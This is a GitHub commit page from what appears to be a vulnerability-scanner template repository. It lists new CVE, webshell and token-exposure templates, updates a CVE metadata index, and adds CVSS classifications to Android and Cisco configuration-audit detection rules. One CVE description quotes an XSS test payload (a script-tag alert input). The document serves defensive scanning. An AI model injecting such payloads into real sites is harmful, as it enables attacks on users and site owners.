Merge branch 'main' into remove-comments

patch-1
pussycat0x 2023-07-07 16:38:46 +05:30 committed by GitHub
commit 0ccffd229a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
122 changed files with 1517 additions and 286 deletions

View File

@ -1,16 +1,46 @@
file/keys/adafruit-key.yaml
file/keys/adobe/adobe-client.yaml
file/keys/airtable-key.yaml
file/keys/algolia-key.yaml
file/keys/alibaba/alibaba-key-id.yaml
file/keys/alibaba/alibaba-secret-id.yaml
file/keys/asana/asana-clientid.yaml
file/keys/asana/asana-clientsecret.yaml
file/keys/atlassian/atlassian-api-token.yaml
file/webshell/asp-webshell.yaml file/webshell/asp-webshell.yaml
file/webshell/jsp-webshell.yaml file/webshell/jsp-webshell.yaml
file/webshell/php-webshell.yaml file/webshell/php-webshell.yaml
http/cnvd/2022/CNVD-2022-86535.yaml http/cnvd/2022/CNVD-2022-86535.yaml
http/cves/2012/CVE-2012-5321.yaml
http/cves/2018/CVE-2018-6530.yaml http/cves/2018/CVE-2018-6530.yaml
http/cves/2023/CVE-2023-0297.yaml
http/cves/2023/CVE-2023-28121.yaml http/cves/2023/CVE-2023-28121.yaml
http/cves/2023/CVE-2023-2822.yaml
http/default-logins/esafenet-cdg-default-login.yaml
http/default-logins/pyload/pyload-default-login.yaml
http/exposed-panels/arangodb-web-Interface.yaml http/exposed-panels/arangodb-web-Interface.yaml
http/exposed-panels/arcserve-panel.yaml http/exposed-panels/arcserve-panel.yaml
http/exposed-panels/c2/hookbot-rat.yaml
http/exposed-panels/cloudpanel-login.yaml http/exposed-panels/cloudpanel-login.yaml
http/exposed-panels/dell-idrac.yaml http/exposed-panels/dell-idrac.yaml
http/exposed-panels/efak-login-panel.yaml http/exposed-panels/efak-login-panel.yaml
http/exposed-panels/pritunl-panel.yaml http/exposed-panels/pritunl-panel.yaml
http/exposed-panels/pyload-panel.yaml
http/exposed-panels/shell-box.yaml http/exposed-panels/shell-box.yaml
http/exposed-panels/untangle-admin-login.yaml http/exposed-panels/untangle-admin-login.yaml
http/exposed-panels/uptime-kuma-panel.yaml http/exposed-panels/uptime-kuma-panel.yaml
http/exposures/configs/collibra-properties.yaml http/exposures/configs/collibra-properties.yaml
http/exposures/files/pnpm-lock.yaml
http/exposures/tokens/adafruit/adafruit-api-key.yaml
http/exposures/tokens/adobe/adobe-client-id.yaml
http/exposures/tokens/airtable/airtable-api-key.yaml
http/exposures/tokens/algolia/algolia-api-key.yaml
http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml
http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml
http/exposures/tokens/asana/asana-client-id.yaml
http/exposures/tokens/asana/asana-client-secret.yaml
http/exposures/tokens/atlassian-token.yaml
http/misconfiguration/unauth-temporal-web-ui.yaml
misconfiguration/proxy/open-proxy-external.yaml
network/misconfig/apache-dubbo-unauth.yaml
network/misconfig/apache-rocketmq-broker-unauth.yaml

View File

@ -25,7 +25,9 @@ tags:
files: files:
- http/cves/2006/CVE-2006-1681.yaml - http/cves/2006/CVE-2006-1681.yaml
- http/cves/2007/CVE-2007-5728.yaml - http/cves/2007/CVE-2007-5728.yaml
- http/cves/2011/CVE-2011-4618.yaml
- http/cves/2014/CVE-2014-9608.yaml - http/cves/2014/CVE-2014-9608.yaml
- http/cves/2018/CVE-2018-5316.yaml
- http/cves/2018/CVE-2018-5233.yaml - http/cves/2018/CVE-2018-5233.yaml
- http/cves/2019/CVE-2019-14696.yaml - http/cves/2019/CVE-2019-14696.yaml
- http/cves/2020/CVE-2020-11930.yaml - http/cves/2020/CVE-2020-11930.yaml

View File

@ -1380,6 +1380,15 @@
} }
}, },
{ {
"author": "noraj",
"links": {
"github": "https://github.com/noraj",
"twitter": "https://twitter.com/noraj_rawsec",
"linkedin": "",
"website": "https://pwn.by/noraj",
"email": ""
}
},{
"author": "mabdullah22", "author": "mabdullah22",
"links": { "links": {
"github": "https://www.github.com/maabdullah22", "github": "https://www.github.com/maabdullah22",
@ -1389,5 +1398,4 @@
"email": "" "email": ""
} }
} }
] ]

View File

@ -1783,6 +1783,7 @@
{"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"} {"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"}
{"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"} {"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"}
{"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"} {"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"}
{"ID":"CVE-2023-0297","Info":{"Name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","Severity":"critical","Description":"Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0297.yaml"}
{"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input \"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"} {"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input \"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"}
{"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"} {"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"}
{"ID":"CVE-2023-0562","Info":{"Name":"Bank Locker Management System v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0562.yaml"} {"ID":"CVE-2023-0562","Info":{"Name":"Bank Locker Management System v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0562.yaml"}
@ -1845,6 +1846,7 @@
{"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"} {"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"}
{"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"} {"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"}
{"ID":"CVE-2023-28121","Info":{"Name":"WooCommerce Payments - Unauthorized Admin Access","Severity":"critical","Description":"An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28121.yaml"} {"ID":"CVE-2023-28121","Info":{"Name":"WooCommerce Payments - Unauthorized Admin Access","Severity":"critical","Description":"An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28121.yaml"}
{"ID":"CVE-2023-2822","Info":{"Name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2822.yaml"}
{"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"} {"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"}
{"ID":"CVE-2023-28343","Info":{"Name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","Severity":"critical","Description":"Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28343.yaml"} {"ID":"CVE-2023-28343","Info":{"Name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","Severity":"critical","Description":"Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28343.yaml"}
{"ID":"CVE-2023-28432","Info":{"Name":"MinIO Cluster Deployment - Information Disclosure","Severity":"high","Description":"MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-28432.yaml"} {"ID":"CVE-2023-28432","Info":{"Name":"MinIO Cluster Deployment - Information Disclosure","Severity":"high","Description":"MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-28432.yaml"}

View File

@ -1 +1 @@
b830e8b5ef413ec8d972848bd93b95d8 be483aa0e41e51f1744cd9bd05cb8c4d

View File

@ -1,9 +1,14 @@
id: biometric-detect id: biometric-detect
info: info:
name: Biometric or Fingerprint detect name: Android Biometric/Fingerprint - Detect
author: gaurang author: gaurang
severity: info severity: info
description: Android Biometric/Fingerprint permission files were detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: android,file tags: android,file
file: file:
@ -15,3 +20,5 @@ file:
words: words:
- "android.permission.USE_FINGERPRINT" - "android.permission.USE_FINGERPRINT"
- "android.permission.USE_BIOMETRIC" - "android.permission.USE_BIOMETRIC"
# Enhanced by md on 2023/05/02

View File

@ -1,9 +1,14 @@
id: improper-certificate-validation id: improper-certificate-validation
info: info:
name: Improper Certificate Validation name: Android Improper Certificate Validation - Detect
author: gaurang author: gaurang
severity: medium severity: medium
description: Android improper certificate validation was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
tags: android,file tags: android,file
file: file:
@ -14,3 +19,5 @@ file:
- type: word - type: word
words: words:
- "Landroid/webkit/SslErrorHandler;->proceed()V" - "Landroid/webkit/SslErrorHandler;->proceed()V"
# Enhanced by md on 2023/05/02

View File

@ -1,9 +1,14 @@
id: content-scheme id: content-scheme
info: info:
name: Content Scheme Enabled name: Android Content Scheme - Detect
author: gaurang author: gaurang
severity: info severity: info
description: Android content scheme enabling was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: android,file tags: android,file
file: file:
@ -14,3 +19,5 @@ file:
- type: word - type: word
words: words:
- "android:scheme=\"content\"" - "android:scheme=\"content\""
# Enhanced by md on 2023/05/03

View File

@ -4,6 +4,7 @@ info:
name: Android Debug Enabled name: Android Debug Enabled
author: gaurang author: gaurang
severity: low severity: low
description: Android debug enabling was detected.
tags: android,file tags: android,file
file: file:

View File

@ -1,13 +1,18 @@
id: deep-link-detect id: deep-link-detect
info: info:
name: Deep Link Detection name: Android Deep Link - Detect
author: Hardik-Solanki author: Hardik-Solanki
severity: info severity: info
description: Android deep link functionality was detected.
reference: reference:
- https://developer.android.com/training/app-links/deep-linking - https://developer.android.com/training/app-links/deep-linking
- https://www.geeksforgeeks.org/deep-linking-in-android-with-example/ - https://www.geeksforgeeks.org/deep-linking-in-android-with-example/
- https://medium.com/@muratcanbur/intro-to-deep-linking-on-android-1b9fe9e38abd - https://medium.com/@muratcanbur/intro-to-deep-linking-on-android-1b9fe9e38abd
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata: metadata:
verified: true verified: true
tags: android,file,deeplink tags: android,file,deeplink
@ -24,3 +29,5 @@ file:
- "android:host" - "android:host"
- "android:name" - "android:name"
condition: and condition: and
# Enhanced by md on 2023/05/02

View File

@ -1,9 +1,14 @@
id: dynamic-registered-broadcast-receiver id: dynamic-registered-broadcast-receiver
info: info:
name: Dynamic Registered Broadcast Receiver name: Android Dynamic Broadcast Receiver Register - Detect
author: gaurang author: gaurang
severity: info severity: info
description: Android dynamic broadcast receiver register functionality was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: android,file tags: android,file
file: file:
@ -14,3 +19,5 @@ file:
- type: word - type: word
words: words:
- ";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)" - ";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)"
# Enhanced by md on 2023/05/02

View File

@ -1,9 +1,14 @@
id: file-scheme id: file-scheme
info: info:
name: File Scheme Enabled name: Android File Scheme - Detect
author: gaurang author: gaurang
severity: info severity: info
description: Android file scheme enabling was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: android,file tags: android,file
file: file:
@ -14,3 +19,5 @@ file:
- type: word - type: word
words: words:
- "android:scheme=\"file\"" - "android:scheme=\"file\""
# Enhanced by md on 2023/05/03

View File

@ -1,9 +1,14 @@
id: insecure-provider-path id: insecure-provider-path
info: info:
name: Insecure Provider Path name: Android Insecure Provider Path - Detect
author: gaurang author: gaurang
severity: medium severity: medium
description: Android insecure provider path was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
tags: android,file tags: android,file
file: file:
@ -15,3 +20,5 @@ file:
regex: regex:
- "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\".\"" - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\".\""
- "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\"\"" - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\"\""
# Enhanced by md on 2023/05/02

View File

@ -1,9 +1,14 @@
id: webview-addjavascript-interface id: webview-addjavascript-interface
info: info:
name: Webview addJavascript Interface Usage name: Android WebView Add Javascript Interface - Detect
author: gaurang author: gaurang
severity: info severity: info
description: Android WebView Add Javascript interface usage was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
tags: android,file tags: android,file
file: file:
@ -14,3 +19,5 @@ file:
- type: word - type: word
words: words:
- ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V" - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V"
# Enhanced by md on 2023/05/02

View File

@ -1,9 +1,14 @@
id: webview-javascript-enabled id: webview-javascript-enabled
info: info:
name: Webview JavaScript enabled name: WebView JavaScript - Detect
author: gaurang author: gaurang
severity: info severity: info
description: WebView Javascript enabling was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: android,file,javascript tags: android,file,javascript
file: file:
@ -14,3 +19,5 @@ file:
- type: word - type: word
words: words:
- "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V" - "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V"
# Enhanced by md on 2023/05/03

View File

@ -1,9 +1,14 @@
id: webview-load-url id: webview-load-url
info: info:
name: Webview loadUrl usage name: WebView loadUrl - Detect
author: gaurang author: gaurang
severity: info severity: info
description: WebView loadUrl usage was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: android,file tags: android,file
file: file:
@ -14,3 +19,5 @@ file:
- type: word - type: word
words: words:
- "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V" - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V"
# Enhanced by md on 2023/05/02

View File

@ -1,9 +1,14 @@
id: webview-universal-access id: webview-universal-access
info: info:
name: Webview Universal Access enabled name: Android WebView Universal Access - Detect
author: gaurang author: gaurang
severity: medium severity: medium
description: Android WebView Universal Access enabling was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
tags: android,file tags: android,file
file: file:
@ -14,3 +19,5 @@ file:
- type: word - type: word
words: words:
- "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V"
# Enhanced by md on 2023/05/03

View File

@ -1,13 +1,17 @@
id: configure-aaa-service id: configure-aaa-service
info: info:
name: Configure AAA service name: Cisco AAA Service Configuration - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: | description: |
Authentication, authorization and accounting (AAA) services provide an authoritative source for managing and monitoring access for devices. Cisco authentication, authorization and accounting service configuration was detected.
reference: reference:
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-a2.html#GUID-E05C2E00-C01E-4053-9D12-EC37C7E8EEC5 - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-a2.html#GUID-E05C2E00-C01E-4053-9D12-EC37C7E8EEC5
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: cisco,config-audit,cisco-switch,file,router tags: cisco,config-audit,cisco-switch,file,router
file: file:
@ -24,3 +28,5 @@ file:
- type: word - type: word
words: words:
- "configure terminal" - "configure terminal"
# Enhanced by md on 2023/05/02

View File

@ -1,13 +1,17 @@
id: configure-service-timestamps-debug id: configure-service-timestamps-debug
info: info:
name: Configure Service Timestamps for Debug name: Cisco Configure Service Timestamps for Debug - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: | description: |
To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service. The configuration for service timestamps on Cisco devices was not implemented for debugging purposes. It's important to note that timestamps can be added to either debugging or logging messages independently.
reference: reference:
- https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: cisco,config-audit,cisco-switch,file,router tags: cisco,config-audit,cisco-switch,file,router
file: file:
@ -24,3 +28,5 @@ file:
- type: word - type: word
words: words:
- "configure terminal" - "configure terminal"
# Enhanced by md on 2023/05/02

View File

@ -1,13 +1,17 @@
id: configure-service-log-messages id: configure-service-log-messages
info: info:
name: Configure Service Timestamps Log Messages name: Cisco Configure Service Timestamps Log Messages - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: | description: |
To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service. Cisco service timestamp configuration for log messages was not implemented.
reference: reference:
- https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: cisco,config-audit,cisco-switch,file,router tags: cisco,config-audit,cisco-switch,file,router
file: file:
@ -24,3 +28,5 @@ file:
- type: word - type: word
words: words:
- "configure terminal" - "configure terminal"
# Enhanced by md on 2023/05/02

View File

@ -1,13 +1,18 @@
id: disable-ip-source-route id: disable-ip-source-route
info: info:
name: Disable IP source-route name: Cisco Disable IP Source-Route - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: | description: |
Organizations should plan and implement network policies to ensure unnecessary services are explicitly disabled. The 'ip source-route' feature has been used in several attacks and should be disabled. Cisco IP source-route functionality has been utilized in several attacks. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: Disable IP source-route where appropriate.
reference: reference:
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr/command/ipaddr-cr-book/ipaddr-i4.html#GUID-C7F971DD-358F-4B43-9F3E-244F5D4A3A93 - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr/command/ipaddr-cr-book/ipaddr-i4.html#GUID-C7F971DD-358F-4B43-9F3E-244F5D4A3A93
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: cisco,config-audit,cisco-switch,file,router tags: cisco,config-audit,cisco-switch,file,router
file: file:

View File

@ -1,13 +1,17 @@
id: disable-pad-service id: disable-pad-service
info: info:
name: Disable PAD service name: Cisco Disable PAD - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: | description: |
To reduce the risk of unauthorized access, organizations should implement a security policy restricting unnecessary services such as the 'PAD' service. Cisco PAD service has proven vulnerable to attackers. To reduce the risk of unauthorized access, organizations should implement a security policy restricting or disabling unnecessary access.
reference: reference:
- http://www.cisco.com/en/US/docs/ios-xml/ios/wan/command/wan-s1.html#GUID-C5497B77-3FD4-4D2F-AB08-1317D5F5473B - http://www.cisco.com/en/US/docs/ios-xml/ios/wan/command/wan-s1.html#GUID-C5497B77-3FD4-4D2F-AB08-1317D5F5473B
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: cisco,config-audit,cisco-switch,file,router tags: cisco,config-audit,cisco-switch,file,router
file: file:

View File

@ -1,13 +1,17 @@
id: logging-enable id: logging-enable
info: info:
name: Logging enable name: Cisco Logging Enable - Detect
author: pussycat0x author: pussycat0x
severity: info severity: info
description: | description: |
Enabling the Cisco IOS 'logging enable' command enforces the monitoring of technology risks for the organizations' network devices. Cisco logging 'logging enable' enable command enforces the monitoring of technology risks for organizations' network devices.
reference: reference:
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/xe-16-6/config-mgmt-xe-16-6-book/cm-config-logger.pdf - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/xe-16-6/config-mgmt-xe-16-6-book/cm-config-logger.pdf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
